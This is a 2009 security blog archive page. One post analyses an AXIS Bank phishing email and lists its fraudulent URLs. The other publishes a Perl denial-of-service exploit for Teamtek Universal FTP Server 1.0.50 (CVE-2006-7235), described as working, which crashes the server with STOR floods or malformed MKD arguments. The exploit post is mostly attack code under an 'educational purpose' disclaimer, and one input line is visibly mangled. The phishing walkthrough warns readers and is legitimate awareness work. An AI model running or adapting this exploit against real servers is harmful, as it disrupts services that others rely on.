Security Unplugged !!!: February 2009

Wednesday, February 11, 2009

AXIS Bank Phishing2...Be Careful !

Don't be surprised if you get a mail from AXIS bank (infact not from AXIS bank but from malicious user) saying "MPORTANT NOTICE: Update Your Axis Bank Ltd® Net Banking Details" (this is the subject). Notice the missing "I" for word IMPORTANT in the subject. Most people might end up reading reading "MPORTANT" as "IMPORTANT".
The mail looks like

Clicking "Update Your NetBanking Account" will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/RetailSignOn.htm
which looks like

Write anything in "Login ID" and "Password" text boxes and Click "Submit" tab without selecting the radio buttons, this will redirect us to
http://axisaccountsummary.t35.com/axisbank.co.in/authenticate.php
The authenticate.php page looks like

On this page we find "Download","Click Here" hyperlinks, on clicking them will redirect to
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Ciconnectform.pdf
https://www.axisbank.co.in/BankAway/(b5zbwu55bnaszw55d2iyuz55)/web/L001/retail/jsp/user/%5Cdownload%5Cicoftfform.pdf
respectively. Above URL's which point to the real website are using HTTPS request to get the resource and we can see the Phishing filter(Lock symbol) on down left but we get "The page cannot be found" error while downloading the PDF's.
Enter any arbitrary data into "ATM Card No.", "ATM Pin No.","Transaction Password" and click "Continue" tab which will redirect to
http://christkingdomorphanage.org/idbi2/accountsummary.php

I browsed to the Contact Us page (http://www.christkingdomorphanage.org/contactus.php) where the address is mentioned as
CHRIST KINGDOM ORPHANAGE HOME
UMUEZEALAKPA ALAENYI
OGWA, MBAITOLI LGA,
IMO STATE, NIGERIA
p: (+234) 8033738658
e: http://www.christkingdomorphanage.org/info@christkingdomorphanage.org
w: http://www.christkingdomorphanage.org/

Well, this might be the phishing mail originating from Nigeria, most probably.

Safe Surfing...Enjoy!!!

Tuesday, February 3, 2009

Teamtek Universal FTP Server 1.0.50 DoS (daemon crash/ hang)

This is a working exploit for an old Vulnerability which was updated recently.

############################################################
#
# Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service (daemon crash or hang) via (1)
# multiple STOR (aka PUT) commands, or an MKD command followed by (2) a '*' argument, (3) a '|' argument,
# (4) spaces, or (5) a long string. NOTE: the provenance of this information is unknown; the details are obtained solely
# from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
# http://www.securityfocus.com/bid/21085
#
# Tested on Windows XP SP1 with
# Universal FTP Server 1.0.44

# Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net

# With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
# With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"

# (say #!C:/Perl/bin/perl -w)

# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
# Author: Praveen Darhanam
# Email: praveen[underscore]recker[at]sify.com

# Blog: http://darshanams.blogspot.com

# Date: 20th December, 2008

##########################################################
use Net::FTP;

$ftp_dos_mkd=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: ]#perl script_name

vuln_target_ip r Host\n";
$ftp_dos_mkd -> login("anonymous","anonymous") || die "Could not Login...Retry";
print "Enter 1 to launch FTP DoS using using multiple STOR/PUT commands\n";

print "Enter 2 to launch FTP DoS using directory name as * with MKD command\n";
print "Enter 3 to launch FTP DoS using directory name as | with MKD command\n";

print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
print "Enter 5 to launch FTP DoS using MKD command followed by long string\n";

$special_char=;
chomp($special_char);

if($special_char==1)
{
while(1)
{
$ftp_dos_mkd -> stor("abc.txt");
}
}
elsif($special_char==2)
{
$ftp_dos_mkd -> mkdir("*");
}
elsif($special_char==3)
{
$ftp_dos_mkd -> mkdir("|");
}
elsif($special_char==4)
{
my $buf1 = "\x20" x 100000;
$ftp_dos_mkd -> mkdir("$buf1");
}
elsif($special_char==5)
{
my $buf2 = "D" x 100000;
$ftp_dos_mkd -> mkdir("$buf2");
}
else
{
printf "Please enter correct number to launch exploit !!";
}
$ftp_dos_mkd->quit;